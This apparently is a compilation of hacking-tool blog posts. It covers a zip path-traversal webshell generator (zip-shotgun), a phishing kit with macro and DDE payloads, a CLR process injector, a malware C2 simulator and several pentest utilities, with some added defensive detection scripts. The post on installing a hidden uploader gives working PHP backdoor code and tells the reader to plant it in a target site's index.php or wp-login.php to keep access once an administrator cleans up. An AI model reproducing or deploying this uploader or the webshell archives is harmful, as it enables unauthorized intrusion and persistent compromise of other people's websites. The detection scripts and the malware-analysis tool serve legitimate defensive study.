ZIP Shotgun - Utility Script To Test Zip File Upload Functionality (And Possible Extraction Of Zip Files) For Vulnerabilities

- Sunday, December 16, 2018

Utility script to test zip file upload functionality (and possible extraction of zip files) for vulnerabilities. The idea for this script comes from a post on the Silent Signal Techblog, "Compressed File Upload And Command Execution", and from OWASP's "Test Upload of Malicious Files".
This script creates an archive containing files with "../" in their filenames. When such an archive is extracted without validating the entry names, files can be written to directories above the intended extraction directory. This can allow an attacker to place shells in directories that can be accessed from a web browser.
The default webshell is wwwolf's PHP web shell, and all the credit for it goes to WhiteWinterWolf. Source is available here.
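On the receiving side, the archives described above can be caught before extraction. The following is an added example, not part of zip-shotgun or the original post: it audits every entry of an uploaded zip for the traits visible in the tool's output (parent-directory names, chmod 777, a script extension) and refuses to extract if any are found. The function names, the extension list and the sample archive are assumptions made for this example.

```python
import io
import posixpath
import stat
import zipfile

# Extensions a web server might execute; an assumption for this example.
SCRIPT_EXTENSIONS = {".php", ".phtml", ".jsp", ".aspx"}


def audit_member(info):
    """Return the reasons (possibly none) why this zip entry should be rejected."""
    reasons = []
    # ZIP names use "/", but some writers emit "\"; normalise before checking.
    name = info.filename.replace("\\", "/")
    if name.startswith("/") or (len(name) > 1 and name[1] == ":"):
        reasons.append("absolute path")
    # Resolve "." and ".." lexically: a leading ".." after normalisation
    # means the entry climbs above the extraction directory.
    normalised = posixpath.normpath(name)
    if normalised == ".." or normalised.startswith("../"):
        reasons.append("path traversal")
    # Unix permission bits live in the high 16 bits of external_attr.
    mode = (info.external_attr >> 16) & 0xFFFF
    if stat.S_ISLNK(mode):
        reasons.append("symbolic link")
    if mode & stat.S_IWOTH:
        reasons.append("world-writable mode %o" % stat.S_IMODE(mode))
    if posixpath.splitext(name)[1].lower() in SCRIPT_EXTENSIONS:
        reasons.append("server-side script extension")
    return reasons


def audit_archive(data):
    """Map each offending entry name to its reasons; an empty dict means clean."""
    findings = {}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            reasons = audit_member(info)
            if reasons:
                findings[info.filename] = reasons
    return findings


def extract_if_clean(data, dest):
    """Extract only when no entry was flagged; otherwise refuse the whole upload."""
    findings = audit_archive(data)
    if findings:
        raise ValueError("archive rejected: %s" % sorted(findings))
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        zf.extractall(dest)
        return sorted(zf.namelist())


def build_sample():
    """Constructed test archive mirroring the entry names in the tool's log
    output (name, ../name, ../../name); the payload is inert text."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for depth in range(3):
            info = zipfile.ZipInfo("../" * depth + "sample.php")
            info.external_attr = 0o100777 << 16  # regular file, mode 777
            zf.writestr(info, "placeholder, not a shell")
        zf.writestr("docs/readme.txt", "benign entry")
    return buf.getvalue()


if __name__ == "__main__":
    for entry, why in audit_archive(build_sample()).items():
        print("%-20s %s" % (entry, ", ".join(why)))
```

Python's own `zipfile.extractall` already strips ".." components, but many other extraction routines do not, so the audit is worth running regardless of the library that performs the extraction.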

Installation
  1. Install using Python pip
    pip install zip-shotgun --upgrade
  2. Clone git repository and install
    git clone https://github.com/jpiechowka/zip-shotgun.git
    Execute from root directory of the cloned repository (where setup.py file is located)
    pip install . --upgrade

Usage and options
Usage: zip-shotgun [OPTIONS] OUTPUT_ZIP_FILE

Options:
  --version                       Show the version and exit.
  -c, --directories-count INTEGER
                                  Count of how many directories to go back
                                  inside the zip file (e.g 3 means that 3
                                  files will be added to the zip: shell.php,
                                  ../shell.php and ../../shell.php where
                                  shell.php is the name of the shell you
                                  provided or randomly generated value
                                  [default: 16]
  -n, --shell-name TEXT           Name of the shell inside the generated zip
                                  file (e.g shell). If not provided it will be
                                  randomly generated. Cannot have whitespaces
  -f, --shell-file-path PATH      A file that contains code for the shell. If
                                  this option is not provided wwwolf
                                  (https://github.com/WhiteWinterWolf/wwwolf-
                                  php-webshell) php shell will be added
                                  instead. If name is provided it will be
                                  added to the zip with the provided name or
                                  if not provided the name will be randomly
                                  generated.
  --compress                      Enable compression. If this flag is set
                                  archive will be compressed using DEFALTE
                                  algorithm with compression level of 9. By
                                  default there is no compression applied.
  -h, --help                      Show this message and exit.

Examples
  1. Using all default options
    zip-shotgun archive.zip
    Part of the script output
    12/Dec/2018 Wed 23:13:13 +0100 |     INFO | Opening output zip file: REDACTED\zip-shotgun\archive.zip
    12/Dec/2018 Wed 23:13:13 +0100 |  WARNING | Shell name was not provided. Generated random shell name: BCsQOkiN23ur7OUj
    12/Dec/2018 Wed 23:13:13 +0100 |  WARNING | Shell file was not provided. Using default wwwolf's webshell code
    12/Dec/2018 Wed 23:13:13 +0100 |     INFO | Using default file extension for wwwolf's webshell: php
    12/Dec/2018 Wed 23:13:13 +0100 |     INFO | --compress flag was NOT set. Archive will be uncompressed. Files will be only stored.
    12/Dec/2018 Wed 23:13:13 +0100 |     INFO | Writing file to the archive: BCsQOkiN23ur7OUj.php
    12/Dec/2018 Wed 23:13:13 +0100 |     INFO | Setting full read/write/execute permissions (chmod 777) for file: BCsQOkiN23ur7OUj.php
    12/Dec/2018 Wed 23:13:13 +0100 |     INFO | Writing file to the archive: ../BCsQOkiN23ur7OUj.php
    12/Dec/2018 Wed 23:13:13 +0100 |     INFO | Setting full read/write/execute permissions (chmod 777) for file: ../BCsQOkiN23ur7OUj.php
    12/Dec/2018 Wed 23:13:13 +0100 |     INFO | Writing file to the archive: ../../BCsQOkiN23ur7OUj.php
    12/Dec/2018 Wed 23:13:13 +0100 |     INFO | Setting full read/write/execute permissions (chmod 777) for file: ../../BCsQOkiN23ur7OUj.php
    ...
    12/Dec/2018 Wed 23:13:13 +0100 |     INFO | Finished. Try to access shell using BCsQOkiN23ur7OUj.php in the URL
  2. Using default options and enabling compression for archive file
    zip-shotgun --compress archive.zip
    Part of the script output
    12/Dec/2018 Wed 23:16:13 +0100 |     INFO | Opening output zip file: REDACTED\zip-shotgun\archive.zip
    12/Dec/2018 Wed 23:16:13 +0100 |  WARNING | Shell name was not provided. Generated random shell name: 6B6NtnZXbXSubDCh
    12/Dec/2018 Wed 23:16:13 +0100 |  WARNING | Shell file was not provided. Using default wwwolf's webshell code
    12/Dec/2018 Wed 23:16:13 +0100 |     INFO | Using default file extension for wwwolf's webshell: php
    12/Dec/2018 Wed 23:16:13 +0100 |     INFO | --compress flag was set. Archive will be compressed using DEFLATE algorithm with a level of 9
    ...
    12/Dec/2018 Wed 23:16:13 +0100 |     INFO | Finished. Try to access shell using 6B6NtnZXbXSubDCh.php in the URL
  3. Using default options but changing the number of directories to go back in the archive to 3
    zip-shotgun --directories-count 3 archive.zip
    zip-shotgun -c 3 archive.zip
    The script will write 3 files in total to the archive
    Part of the script output
    12/Dec/2018 Wed 23:17:43 +0100 |     INFO | Opening output zip file: REDACTED\zip-shotgun\archive.zip
    12/Dec/2018 Wed 23:17:43 +0100 |  WARNING | Shell name was not provided. Generated random shell name: 34Bv9YoignMHgk2F
    12/Dec/2018 Wed 23:17:43 +0100 |  WARNING | Shell file was not provided. Using default wwwolf's webshell code
    12/Dec/2018 Wed 23:17:43 +0100 |     INFO | Using default file extension for wwwolf's webshell: php
    12/Dec/2018 Wed 23:17:43 +0100 |     INFO | --compress flag was NOT set. Archive will be uncompressed. Files will be only stored.
    12/Dec/2018 Wed 23:17:43 +0100 |     INFO | Writing file to the archive: 34Bv9YoignMHgk2F.php
    12/Dec/2018 Wed 23:17:43 +0100 |     INFO | Setting full read/write/execute permissions (chmod 777) for file: 34Bv9YoignMHgk2F.php
    12/Dec/2018 Wed 23:17:43 +0100 |     INFO | Writing file to the archive: ../34Bv9YoignMHgk2F.php
    12/Dec/2018 Wed 23:17:43 +0100 |     INFO | Setting full read/write/execute permissions (chmod 777) for file: ../34Bv9YoignMHgk2F.php
    12/Dec/2018 Wed 23:17:43 +0100 |     INFO | Writing file to the archive: ../../34Bv9YoignMHgk2F.php
    12/Dec/2018 Wed 23:17:43 +0100 |     INFO | Setting full read/write/execute permissions (chmod 777) for file: ../../34Bv9YoignMHgk2F.php
    12/Dec/2018 Wed 23:17:43 +0100 |     INFO | Finished. Try to access shell using 34Bv9YoignMHgk2F.php in the URL
  4. Using default options but providing shell name inside archive and enabling compression
    Shell name cannot have whitespaces
    zip-shotgun --shell-name custom-name --compress archive.zip
    zip-shotgun -n custom-name --compress archive.zip
    Name for shell files inside the archive will be set to the one provided by the user.
    Part of the script output
    12/Dec/2018 Wed 23:19:12 +0100 |     INFO | Opening output zip file: REDACTED\zip-shotgun\archive.zip
    12/Dec/2018 Wed 23:19:12 +0100 |  WARNING | Shell file was not provided. Using default wwwolf's webshell code
    12/Dec/2018 Wed 23:19:12 +0100 |     INFO | Using default file extension for wwwolf's webshell: php
    12/Dec/2018 Wed 23:19:12 +0100 |     INFO | --compress flag was set. Archive will be compressed using DEFLATE algorithm with a level of 9
    12/Dec/2018 Wed 23:19:12 +0100 |     INFO | Writing file to the archive: custom-name.php
    12/Dec/2018 Wed 23:19:12 +0100 |     INFO | Setting full read/write/execute permissions (chmod 777) for file: custom-name.php
    12/Dec/2018 Wed 23:19:12 +0100 |     INFO | Writing file to the archive: ../custom-name.php
    12/Dec/2018 Wed 23:19:12 +0100 |     INFO | Setting full read/write/execute permissions (chmod 777) for file: ../custom-name.php
    12/Dec/2018 Wed 23:19:12 +0100 |     INFO | Writing file to the archive: ../../custom-name.php
    12/Dec/2018 Wed 23:19:12 +0100 |     INFO | Setting full read/write/execute permissions (chmod 777) for file: ../../custom-name.php
    12/Dec/2018 Wed 23:19:12 +0100 |     INFO | Writing file to the archive: ../../../custom-name.php
    ...
    12/Dec/2018 Wed 23:19:12 +0100 |     INFO | Finished. Try to access shell using custom-name.php in the URL
  5. Provide custom shell file but use random name inside archive. Set directories count to 3
    zip-shotgun --directories-count 3 --shell-file-path ./custom-shell.php archive.zip
    zip-shotgun -c 3 -f ./custom-shell.php archive.zip
    Shell code will be extracted from user provided file. Names inside the archive will be randomly generated.
    Part of the script output
    12/Dec/2018 Wed 23:21:37 +0100 |     INFO | Opening output zip file: REDACTED\zip-shotgun\archive.zip
    12/Dec/2018 Wed 23:21:37 +0100 |  WARNING | Shell name was not provided. Generated random shell name: gqXRAJu1LD8d8VKf
    12/Dec/2018 Wed 23:21:37 +0100 |     INFO | File containing shell code was provided: REDACTED\zip-shotgun\custom-shell.php. Content will be added to archive
    12/Dec/2018 Wed 23:21:37 +0100 |     INFO | Getting file extension from provided shell file for reuse: php
    12/Dec/2018 Wed 23:21:37 +0100 |     INFO | Opening provided file with shell code: REDACTED\zip-shotgun\custom-shell.php
    12/Dec/2018 Wed 23:21:37 +0100 |     INFO | --compress flag was NOT set. Archive will be uncompressed. Files will be only stored.
    12/Dec/2018 Wed 23:21:37 +0100 |     INFO | Writing file to the archive: gqXRAJu1LD8d8VKf.php
    12/Dec/2018 Wed 23:21:37 +0100 |     INFO | Setting full read/write/execute permissions (chmod 777) for file: gqXRAJu1LD8d8VKf.php
    12/Dec/2018 Wed 23:21:37 +0100 |     INFO | Writing file to the archive: ../gqXRAJu1LD8d8VKf.php
    12/Dec/2018 Wed 23:21:37 +0100 |     INFO | Setting full read/write/execute permissions (chmod 777) for file: ../gqXRAJu1LD8d8VKf.php
    12/Dec/2018 Wed 23:21:37 +0100 |     INFO | Writing file to the archive: ../../gqXRAJu1LD8d8VKf.php
    12/Dec/2018 Wed 23:21:37 +0100 |     INFO | Setting full read/write/execute permissions (chmod 777) for file: ../../gqXRAJu1LD8d8VKf.php
    12/Dec/2018 Wed 23:21:37 +0100 |     INFO | Finished. Try to access shell using gqXRAJu1LD8d8VKf.php in the URL
  6. Provide custom shell file and set shell name to save inside archive. Set directories count to 3 and use compression
    zip-shotgun --directories-count 3 --shell-name custom-name --shell-file-path ./custom-shell.php --compress archive.zip
    zip-shotgun -c 3 -n custom-name -f ./custom-shell.php --compress archive.zip
    Shell code will be extracted from user provided file. Names inside the archive will be set to user provided name.
    Part of the script output
    12/Dec/2018 Wed 23:25:19 +0100 |     INFO | Opening output zip file: REDACTED\zip-shotgun\archive.zip
    12/Dec/2018 Wed 23:25:19 +0100 |     INFO | File containing shell code was provided: REDACTED\zip-shotgun\custom-shell.php. Content will be added to archive
    12/Dec/2018 Wed 23:25:19 +0100 |     INFO | Getting file extension from provided shell file for reuse: php
    12/Dec/2018 Wed 23:25:19 +0100 |     INFO | Opening provided file with shell code: REDACTED\zip-shotgun\custom-shell.php
    12/Dec/2018 Wed 23:25:19 +0100 |     INFO | --compress flag was set. Archive will be compressed using DEFLATE algorithm with a level of 9
    12/Dec/2018 Wed 23:25:19 +0100 |     INFO | Writing file to the archive: custom-name.php
    12/Dec/2018 Wed 23:25:19 +0100 |     INFO | Setting full read/write/execute permissions (chmod 777) for file: custom-name.php
    12/Dec/2018 Wed 23:25:19 +0100 |     INFO | Writing file to the archive: ../custom-name.php
    12/Dec/2018 Wed 23:25:19 +0100 |     INFO | Setting full read/write/execute permissions (chmod 777) for file: ../custom-name.php
    12/Dec/2018 Wed 23:25:19 +0100 |     INFO | Writing file to the archive: ../../custom-name.php
    12/Dec/2018 Wed 23:25:19 +0100 |     INFO | Setting full read/write/execute permissions (chmod 777) for file: ../../custom-name.php
    12/Dec/2018 Wed 23:25:19 +0100 |     INFO | Finished. Try to access shell using custom-name.php in the URL


Faraday v3.4 - Collaborative Penetration Test and Vulnerability Management Platform


Here are the main new features and improvements in Faraday v3.4:
Services can now be tagged. With this new feature, you can easily identify important services, geolocate them and more.
New search operators OR/NOT
In a previous release we added the AND operator; now with 3.4 you can also use the OR and NOT operators in the Status Report search box.
This will allow you to find vulnerabilities easily with filters like this one:
(severity:critical or severity:high) or name:"MS18-172"
Performance improvements for big workspaces
We have been working on optimizing our REST API endpoints to support millions of vulnerabilities in each workspace.

Here is the full change log for version 3.4
  • In GTK, check active_workspace it's not null
  • Add fbruteforce services fplugin
  • Attachments can be added to a vulnerability through the API.
  • Catch gaierror error on lynis plugin
  • Add OR and NOT with parenthesis support on status report search
  • Info API now is public
  • Web UI now detects Appscan plugin
  • Improve performance on the workspace using custom query
  • Workspaces can be set as active/disable in the welcome page.
  • Change Nmap plugin, response field in VulnWeb now goes to Data field.
  • Update code to support latest SQLAlchemy version
  • Fix `create_vuln` fplugin bug that incorrectly reported duplicated vulns
  • The client can set a custom logo to Faraday
  • Centered checkboxes in user list page
  • Client or pentester can't activate/deactivate workspaces
  • In GTK, dialogs now check that user_info is not False
  • Add tags in Service object (Frontend and backend API)
  • Limit of users only takes the active ones
  • Improve error message when the license is not valid


imaginaryC2 - Tool Which Aims To Help In The Behavioral (Network) Analysis Of Malware


author: Felix Weyne (website) (Twitter)

Imaginary C2 is a python tool which aims to help in the behavioral (network) analysis of malware.
Imaginary C2 hosts a HTTP server which captures HTTP requests towards selectively chosen domains/IPs. Additionally, the tool aims to make it easy to replay captured Command-and-Control responses/served payloads.

By using this tool, an analyst can feed the malware consistent network responses (e.g. C&C instructions for the malware to execute). Additionally, the analyst can capture and inspect HTTP requests towards a domain/IP which is off-line at the time of the analysis.

Replay packet captures
Imaginary C2 provides two scripts to convert packet captures (PCAPs) or Fiddler Session Archives into request definitions which can be parsed by imaginary C2. Via these scripts the user can extract HTTP request URLs and domains, as well as HTTP responses. This way, one can quickly replay HTTP responses for a given HTTP request.

Technical details
requirements: Imaginary C2 requires Python 2.7 and Windows.
modules: Currently, Imaginary C2 contains three modules and two configuration files:
Filename | Function
1. imaginary_c2.py | Hosts python's simple HTTP server. Main module.
2. redirect_to_imaginary_c2.py | Alters Windows' host file and Windows' (IP) Routing Table.
3. unpack_fiddler_archive.py & unpack_pcap.py | Extracts HTTP responses from packet captures. Adds corresponding HTTP request domains and URLs to the configuration files.
4. redirect_config.txt | Contains domains and IPs which need to be redirected to localhost (to the python HTTP server).
5. requests_config.txt | Contains URL path definitions with the corresponding data sources.
request definitions: Each (HTTP) request defined in the request configuration consists of two parameters:
Parameter 1: HTTP request URL path (a.k.a. urlType)
Value | Meaning
fixed | Define the URL path as a literal string
regex | Define a regex pattern to be matched on the URL path
Parameter 2: HTTP response source (a.k.a. sourceType)
Value | Meaning
data | Imaginary C2 will respond with the contents of a file on disk
python | Imaginary C2 will run a python script. The output of the python script defines the HTTP response.

Demo use case: Simulating TrickBot servers
Imaginary C2 can be used to simulate the hosting of TrickBot components and configuration files. Additionally, it can also be used to simulate TrickBot's web injection servers.

How it works:
Upon execution, the TrickBot downloader connects to a set of hardcoded IPs to fetch a few configuration files. One of these configuration files contains the locations (IP addresses) of the TrickBot plugin servers. The Trickbot downloader downloads the plugins (modules) from these servers and decrypts them. The decrypted modules are then injected into a svchost.exe instance.


One of TrickBot's plugins is called injectdll, a plugin which is responsible for TrickBot's webinjects. The injectdll plugin regularly fetches an updated set of webinject configurations. For each targeted (banking) website in the configuration, the address of a webfake server is defined. When a victim browses to a (banking) website which is targeted by TrickBot, his browser secretly gets redirected to the webfake server. The webfake server hosts a replica of the targeted website. This replica website usually is used in a social-engineering attack to defraud the victim.

Imaginary C2 in action:
The below video shows the TrickBot downloader running inside svchost.exe and connecting to imaginary C2 to download two modules. Each downloaded module gets injected into a newly spawned svchost.exe instance. The webinject module tries to steal the browser's saved passwords and exfiltrates the stolen passwords to the TrickBot server. Upon visiting a targeted banking website, TrickBot redirects the browser to the webfake server. In the demo, the webfake server hosts the message: "Default imaginary C2 server response" (full video).



How to Install a Hidden Uploader Script on a Website

- Thursday, November 22, 2018
How to Install a Hidden Uploader Script on a Website - This time we will discuss installing a hidden uploader script on our target website so that we do not lose access.

It is usually used to hide our uploader, so I usually name the file index.php. Just copy the following file:
<?php
if(isset($_GET["uploader"]))
 {
  echo"<font color=#ffffff>".php_uname()."";
  print "\n";$disable_functions = @ini_get("disable_functions"); 
  echo "<br>DisablePHP=".$disable_functions; print "\n"; 
  echo"<br><form method=post enctype=multipart/form-data>"; 
  echo"<input type=file name=f><input name=k type=submit id=k value=upload><br>"; 
    if($_POST["k"]==upload)
{ if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){
echo"<b>".$_FILES["f"]["name"];
}else{
echo"<b>Gagal upload sayang";
}
} 
}
Suppose we find a target whose index.php is empty, for example:
http://target.com/wp-content/uploads
Then we upload the hidden uploader file, which we named index.php, to the directory where index.php is empty. Then we open:
http://target.com/wp-content/uploads/index.php
The page will look blank. To call the uploader, add the query to the URL so that it becomes:
http://target.com/wp-content/uploads/index.php?uploader
The uploader will then be displayed.
This method is usually used as a backup backdoor: if our backdoor has been deleted by the administrator, we can still upload a new backdoor.

Also, this uploader script can be inserted into other scripts. My favourite place is wp-login.php if the target is WordPress. If the target is something else, just put it in the admin login section.
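For site owners, the script above has traits that are easy to sweep for. The following is an added example, not part of the original post: it walks a web root and flags PHP files that combine several of those traits (an upload written under the client-supplied filename, a query-parameter gate, host reconnaissance calls, a location under an uploads directory). The indicator names, the scoring threshold and the sample files are assumptions made for this example.

```python
import os
import re
import tempfile

# Traits of the uploader shown above, each matched independently.
INDICATORS = {
    # copy()/move_uploaded_file() fed directly from $_FILES
    "upload_write": re.compile(r"(?:copy|move_uploaded_file)\s*\(\s*\$_FILES", re.I),
    # the client-controlled filename is referenced
    "client_filename": re.compile(
        r"\$_FILES\s*\[[^\]]+\]\s*\[\s*[\"']name[\"']\s*\]", re.I),
    # output only appears when a query parameter is present
    "param_gate": re.compile(r"isset\s*\(\s*\$_(?:GET|REQUEST)\s*\[", re.I),
    # fingerprinting of the host before use
    "host_recon": re.compile(
        r"php_uname\s*\(|ini_get\s*\(\s*[\"']disable_functions", re.I),
}


def indicators_for(full_path, rel_path):
    """Return the names of all indicators that match one PHP file."""
    with open(full_path, "r", errors="replace") as fh:
        text = fh.read()
    hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
    # PHP code has no business inside an uploads directory.
    if "uploads" in rel_path.split("/")[:-1]:
        hits.append("php_in_uploads")
    return hits


def scan_tree(root, threshold=3):
    """Map relative path -> indicators for files scoring at least `threshold`."""
    flagged = {}
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            if not fname.lower().endswith((".php", ".phtml")):
                continue
            full = os.path.join(dirpath, fname)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            hits = indicators_for(full, rel)
            if len(hits) >= threshold:
                flagged[rel] = hits
    return flagged


# Constructed sample files: a condensed copy of the markers in the script
# above, plus two benign files that must not be flagged.
UPLOADER = (
    '<?php\nif(isset($_GET["uploader"])) {\n  echo php_uname();\n'
    '  if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])) { echo "ok"; }\n}\n'
)
SAMPLES = {
    "wp-content/uploads/index.php": UPLOADER,
    "wp-login.php": "<?php\n// constructed stand-in for a login page\n?>\n" + UPLOADER,
    "wp-content/index.php": "<?php\n// Silence is golden.\n",
    "wp-content/plugins/form/handler.php": (
        '<?php\n$target = $dir . "/" . basename($_FILES["doc"]["name"]);\n'
        'move_uploaded_file($_FILES["doc"]["tmp_name"], $target);\n'
    ),
}


def build_sample_tree():
    """Write the constructed samples into a temporary web root and return it."""
    root = tempfile.mkdtemp()
    for rel, body in SAMPLES.items():
        full = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    for path, hits in sorted(scan_tree(build_sample_tree()).items()):
        print("%-32s %s" % (path, ", ".join(hits)))
```

Matches are triage leads rather than verdicts. Comparing core files such as wp-login.php against known-good copies of the same release covers insertions that a pattern sweep misses.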

Clrinject - Injects C# EXE Or DLL Assembly Into Every CLR Runtime And AppDomain Of Another Process

- Wednesday, October 10, 2018

Injects C# EXE or DLL Assembly into any CLR runtime and AppDomain of another process. The injected assembly can then access static instances of the injectee process's classes and therefore affect its internal state.

Usage
clrinject-cli.exe -p <processId/processName> -a <assemblyFile>
Opens the process with id <processId> or name <processName>, injects the <assemblyFile> EXE and executes its Main method.

Additional options
  • -e Enumerates all loaded CLR Runtimes and created AppDomains.
  • -d <#> Inject only into <#>-th AppDomain. If no number or zero is specified, assembly is injected into every AppDomain.
  • -i <namespace>.<className> Create an instance of class <className> from namespace <namespace>.

Examples

Usage examples
  • clrinject-cli.exe -p victim.exe -e
    (Enumerate Runtimes and AppDomains from victim.exe)
  • clrinject-cli.exe -p 1234 -a "C:\Path\To\invader.exe" -d 2
    (Inject invader.exe into second AppDomain from process with id 1234)
  • clrinject-cli.exe -p victim.exe -a "C:\Path\To\invader.dll" -i "Invader.Invader"
    (Create instance of Invader inside every AppDomain in victim.exe)
  • clrinject-cli64.exe -p victim64.exe -a "C:\Path\To\invader64.exe"
    (Inject x64 assembly into x64 process)

Injectable assembly example
The following code can be compiled as a C# executable and then injected into a PowerShell process. This code accesses static instances of internal PowerShell classes to change the console text color to green.
using System;
using System.Reflection;

using Microsoft.PowerShell;
using System.Management.Automation.Host;

namespace Invader
{
    class Invader
    {
        static void Main(string[] args)
        {
            try
            {
                var powerShellAssembly = typeof(ConsoleShell).Assembly;
                var consoleHostType = powerShellAssembly.GetType("Microsoft.PowerShell.ConsoleHost");
                var consoleHost = consoleHostType.GetProperty("SingletonInstance", BindingFlags.Static | BindingFlags.NonPublic).GetValue(null);

                var ui = (PSHostUserInterface)consoleHostType.GetProperty("UI").GetValue(consoleHost);
                ui.RawUI.ForegroundColor = ConsoleColor.Green;
            }
            catch (Exception e)
            {
                Console.WriteLine(e.ToString());
            }
        }
    }
}
Injection command:
clrinject-cli64.exe -p powershell.exe -a "C:\Path\To\invader64.exe"

Result:


Note: We have not tested this tool; if you have any questions, please visit the link below directly.

ANDRAX - The First And Unique Penetration Testing Platform For Android Smartphones

- Tuesday, October 9, 2018

ANDRAX The first and unique Penetration Testing platform for Android smartphones
What is ANDRAX
ANDRAX is a penetration testing platform developed specifically for Android smartphones, ANDRAX has the ability to run natively on Android so it behaves like a common Linux distribution, But more powerful t

Docker TOR Hidden Service - Easily Setup A Hidden Service Inside The Tor Network

Easily run a hidden service inside the Tor network with this container.
Generate the skeleton configuration for your hidden service, replacing <pattern> with the name pattern for your hidden service. For example, if you want your hidden service address to contain the word 'boss', just use this word as the argument. You can use regular expressions: ^boss will generate an address which starts with 'boss'. Be aware that the longer the pattern, the more time it will take to generate.

docker run -it --rm -v $(pwd)/web:/web \
       strm/tor-hiddenservice-nginx generate <pattern>
Create a container named 'hiddensite' to serve your generated hidden service
docker run -d --restart=always --name hiddensite -v $(pwd)/web:/web \
       strm/tor-hiddenservice-nginx 

Example
Let's create a hidden service with the name beginning with strm.

docker pull strm/tor-hiddenservice-nginx
Wait for the container image to be downloaded. Then we can generate our site skeleton:
$docker run -it --rm -v $(pwd)/web:/web strm/tor-hiddenservice-nginx generate ^strm
[+] Generating the address with mask: ^strm
[+] Found matching domain after 137072 tries: strmfyygjp5st54g.onion
[+] Generating nginx configuration for site  strmfyygjp5st54g.onion
[+] Creating www folder
[+] Generating index.html template
Now that we have our skeleton generated, we can run the container with:
docker run -d --restart=always --name hiddensite \
       -v $(pwd)/web:/web strm/tor-hiddenservice-nginx
And you have the service running ! :)
Troubleshoot
  • 403 error on nginx: check your directory and folder permissions. Nginx runs as the "hidden" user, whose UID is 666; check that this user has access to the /web/www folder (that is, the host folder mapped to it).
  • Build
    docker build -t strm/tor-hiddenservice-nginx .

    Run
    docker run -d --restart=always --name hiddensite \
           -v $(pwd)/web:/web strm/tor-hiddenservice-nginx

    Shell
    docker run -it --rm -v $(pwd)/web:/web \
           --entrypoint /bin/bash strm/tor-hiddenservice-nginx


     

Camelishing Social Engineering Tool

- Sunday, October 7, 2018
Camelishing Social Engineering Tool - Camelishing is a tool for carrying out social engineering, commonly called "soceng". If you do not know what soceng is, it is a trick for manipulating (deceiving) someone in order to trap them and obtain information from the victim.

The Camelishing tool runs on Windows with Python 3 installed. Before installing this tool, install Python 3 first from here, and of course you should already have Microsoft Office installed as well.

More about Camelishing Social Engineering Tool

Contact

[!]CONTACT[!]
| Coded Abdulaziz ALTUNTAŞ |
| Email: a.azizaltuntas@gmail.com |
| Github: github/azizaltuntas     |
| Twitter: @esccopyright          |

Features

1-Bulk email sending
2-Basic Python Agent Creator
3-Office Excel Macro Creator
4-DDE Excel Creator(or Custom Payload)
5-Return Information
 *[Mail Open Track]
 *[Agent Open Track]

6-AutoSave
7-Statistics Report
8-User Control

Installation Modules

$ pip install -r requirements.txt
$ Install Microsoft Office

If Installation Failed please try to

Install Python 3.6 & Pip3 (Just install Python 3.6, Pip already comes with it!)
Use pip3 to install the requirements
-------------------------
$ pip3 install -r requirements.txt

If you get Error to create Macro

Please follow the steps below! 

Tested and Supported

[+]Windows 7
[+]Windows 10

+SCREENSHOT

Mail Sender

[+] Note :  Compress and send the exe file(rar,zip)

[+] Start Project : python start.py

[Screenshots: Macro Creator, Agent Creator, Agent, DDE Creator, General Setting, Mail Send, Open Mail, Return Information, Statistic Report]

    DarkSpiritz - A Penetration Testing Framework For UNIX Systems

    - Saturday, October 6, 2018

    What is DarkSpiritz?

    Created by the SecTel Team, DarkSpiritz began as a project by one of the owners to update and clean up an older pentesting framework he had created into something modern. DarkSpiritz is a revamp of the very popular framework known as "Roxysploit". If you are familiar with that framework, it will help you with DarkSpiritz. DarkSpiritz also works like another pentesting framework, Metasploit: if you know how to use Metasploit, setting up and working with DarkSpiritz will be a breeze. Inside the program itself you will find a lot of help and documentation on plugins, or you can head to our wiki here. If you need any help, feel free to contact us at sectel.team@protonmail.com.
    Getting Started
    Clone the repository with git:
    git clone https://github.com/DarkSpiritz/DarkSpiritz.git
    DarkSpiritz wiki available here
    To install DarkSpiritz clone the github repo and run:
    sudo python installer.py
    This will download all necessary modules for DarkSpiritz. Once you run this you will be able to run:
    python main.py
    from within the same directory as DarkSpiritz.
    You will see a start-up screen. This screen will display things like commands and configuration settings. You can set configuration settings inside the config.xml file itself or through commands in the DarkSpiritz shell.

    Features:
    These are the features of this program that the DarkSpiritz Team prides itself on:
    • Real Time Updating of Configuration
    • Never a need to restart the program even when adding plugins or editing them.
    • Easy to use UX
    • Multi-functionality

    Screenshots:




     

    Leaked? 2.0 - A Checking Tool For Hash Codes, Passwords And Emails Leaked

    - Monday, September 24, 2018

    Leaked? is a checking tool for leaked hash codes, passwords and emails. It uses the leakz module from Aidan Holland, and the leakz module uses an API from Aurelius Wendelken.
    Leaked? can work on any OS that supports Python 3 and 2.

    What's new?
    • Check email leaked
    • Update
    • More friendly for users
    • Support Python 2 and 3

    Features
    • Check passwords leaked
    • Check hash code leaked
    • Check email leaked NEW!
    • Update NEW!
    • Exit
    • About Author

    Install and Run in Linux
    sudo apt update && sudo apt install python3 python3-pip
    git clone https://github.com/GitHackTools/Leaked
    cd Leaked
    pip3 install -r requirements.txt
    or pip install -r requirements.txt
    python3 leaked.py
    or python leaked.py

    Install and Run in Windows
    Download and run the Python 3 setup file from Python.org. In the Python 3 installer, enable Add Python 3.7 to PATH and For all users.
    Download and run the Git setup file from Git-scm.com, and choose Use Git from Windows Command Prompt.
    After that, run Command Prompt or PowerShell and enter these commands:
    git clone https://github.com/GitHackTools/Leaked
    cd Leaked
    pip install -r requirements.txt
    python leaked.py

    Update Leaked?: git pull -f

    Notes
    Leaked? uses the leakz module from Aidan Holland, and the leakz module uses an API from Aurelius Wendelken.
    Follow their Twitter accounts!

    Screenshots




    Contact to Author